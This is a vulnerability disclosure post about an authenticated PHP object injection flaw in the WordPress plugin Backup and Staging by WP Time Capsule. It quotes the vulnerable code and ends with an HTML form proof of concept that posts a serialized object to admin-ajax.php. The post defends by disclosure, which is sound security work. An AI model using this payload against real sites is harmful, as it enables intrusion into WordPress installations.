Authenticated PHP Object Injection Vulnerability in Backup and Staging by WP Time Capsule
With WordPress plugins that should have obvious heightened security risk we have often found that the security is poor, maybe even poorer that the average plugin. The authenticated PHP object injection vulnerability we ran across in the plugin Backup and Staging by WP Time Capsule is a good example of that insecurity.
On Friday there was a security change made related to PHP object injection to one of the most popular WordPress plugins, Formidable Forms, which has 200,000+ installs. The relevant code seemed to be something that should have been flagged by our Plugin Security Checker and proactive monitoring, but we found that it wasn’t due to usage of an alternate function to what is usually used with vulnerable code. Its usage is so uncommon that according to a search of all the plugins in the WordPress Plugin Directory using WPdirectory it was only one of three with the same basic set up. One of the other plugins was Backup and Staging by WP Time Capsule. At first glance the code in that plugin looked like it would of limited security concern, but further checking showed multiple security failures allow anyone logged in to WordPress that can access the admin area is able to exploit it.
The plugin register the function get_g_drive_authorize_url_wptc() to be accessible through WordPress’ AJAX functionality to those logged in to WordPress:
2247 | add_action('wp_ajax_get_g_drive_authorize_url_wptc', 'get_g_drive_authorize_url_wptc'); |
That function will call the function set_refresh_token_g_drive():
2390 2391 2392 2393 2394 2395 2396 | function get_g_drive_authorize_url_wptc() { WPTC_Base_Factory::get('Wptc_App_Functions')->verify_ajax_requests(); set_server_req_wptc(); $config = WPTC_Factory::get('config'); if(set_refresh_token_g_drive($config) !== false){ |
That function will unserialize the value of the POST input “credsData[g_drive_refresh_token]”, which permits PHP objection to occur:
2413 2414 2415 2416 2417 2418 2419 2420 2421 2422 2423 2424 2425 2426 2427 2428 | function set_refresh_token_g_drive(&$config){ if (empty($_POST['credsData'])) { return false; } if (empty($_POST['credsData']['g_drive_refresh_token'])) { return false; } wptc_log($_POST, '---------------$_POST-----------------'); wptc_log(wp_unslash($_POST['credsData']['g_drive_refresh_token']), '---------------wp_unslash($_POST[credsData g_drive_refresh_token])-----------------'); $config->set_option('default_repo', 'g_drive'); $config->set_option('oauth_state_g_drive', 'access'); $config->set_option('gdrive_old_token', wp_unslash($_POST['credsData']['g_drive_refresh_token'])); $connected_obj = WPTC_Factory::get('g_drive'); $email = trim($config->get_option('main_account_email', true)); $refresh_token_arr = unserialize(wp_unslash($_POST['credsData']['g_drive_refresh_token'])); |
Before that function gets called the function verify_ajax_requests() needs to return true though, which you would assume would limit access the code. That function attempts to do two security checks, though fails at one:
226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 | public function verify_ajax_requests($admin_check = true){ //verify its ajax request if (empty($_POST['action'])) { return false; } //Verifies the Ajax request to prevent processing requests external of the site check_ajax_referer( 'wptc_nonce', 'security' ); if (!$admin_check) { return true; } //Check request made by admin if (!is_admin()) { $this->die_with_msg('you are not authorized'); } } |
The check to see if “request made by admin” will always be true for an AJAX requests, which the function’s name indicates it is meant to verify, since is_admin() always return for true for that. It would seem the check is meant to check if someone is Administrator, but that function doesn’t tell that (the confusion with that was warned about years ago and ignored).
The other check there checks if a valid nonce has been provided to prevent cross-site request forgery (CSRF). Normally access to that would be limited, but in the case of this plugin it is included on every admin page.
The reason for that starts with the registration of the function register_the_js_events_wptc() to run during “admin_enqueue_scripts”:
2204 | add_action('admin_enqueue_scripts', 'register_the_js_events_wptc'); |
That function in turn calls the function wptc_init_nonce():
2175 2176 2177 2178 2179 2180 2181 2182 | function register_the_js_events_wptc($hook) { wp_enqueue_style('wptc-tc-ui', plugins_url() . '/' . basename(dirname(__FILE__)) . '/tc-ui.css', array(), WPTC_VERSION); wp_enqueue_style('wptc-opentip', plugins_url() . '/' . basename(dirname(__FILE__)) . '/css/opentip.css', array(), WPTC_VERSION); wp_enqueue_script('wptc-jquery', false, array(), WPTC_VERSION); wp_enqueue_script('wptc-actions', plugins_url() . '/' . basename(dirname(__FILE__)) . '/time-capsule-update-actions.js', array(), WPTC_VERSION); wp_enqueue_script('wptc-pro-common-listener', plugins_url() . '/' . basename(dirname(__FILE__)) . '/js/ProCommonListener.js', array(), WPTC_VERSION); wptc_init_nonce(); |
That in turn generates the relevant nonce:
2206 2207 2208 2209 2210 2211 2212 2213 | function wptc_init_nonce(){ $params = array( 'ajax_nonce' => wp_create_nonce('wptc_nonce'), 'admin_url' => network_admin_url(), ); wp_localize_script( 'wptc-actions', 'wptc_ajax_object', $params ); } |
Full Disclosure
Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are full disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then leaving a message about that for the developer through the WordPress Support Forum. You can notify the developer of this issue on the forum as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that, but considering that they believe that having plugins, which have millions installs, remain in the Plugin Directory despite them knowing they are vulnerable is “appropriate action”, something is very amiss with them (which is even more reason the moderation needs to be cleaned up).
Update: To clear up the confusion where developers claim we hadn’t tried to notify them through the Support Forum (while at the same time moderators are complaining about us doing just that), here is the message we left for this vulnerability:
Is It Fixed?
If you are reading this post down the road the best way to find out if this vulnerability or other WordPress plugin vulnerabilities in plugins you use have been fixed is to sign up for our service, since what we uniquely do when it comes to that type of data is to test to see if vulnerabilities have really been fixed. Relying on the developer’s information, can lead you astray, as we often find that they believe they have fixed vulnerabilities, but have failed to do that.
Proof of Concept
With our plugin for testing for PHP object injection installed and activated, the following proof of concept will cause the message “PHP object injection has occurred.” be shown, when logged in to WordPress.
Make sure to replace “[path to WordPress]” with the location of WordPress and “[nonce]” with the value of the nonce listed on the line that begins “var wptc_ajax_object” in the source code of an admin page.
<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php?action=get_g_drive_authorize_url_wptc" method="POST">
<input type="hidden" name="security" value="[nonce]" />
<input type="hidden" name="credsData[g_drive_refresh_token]" value='O:20:"php_object_injection":0:{}' />
<input type="submit" value="Submit request" />
</form>
</body>
</html>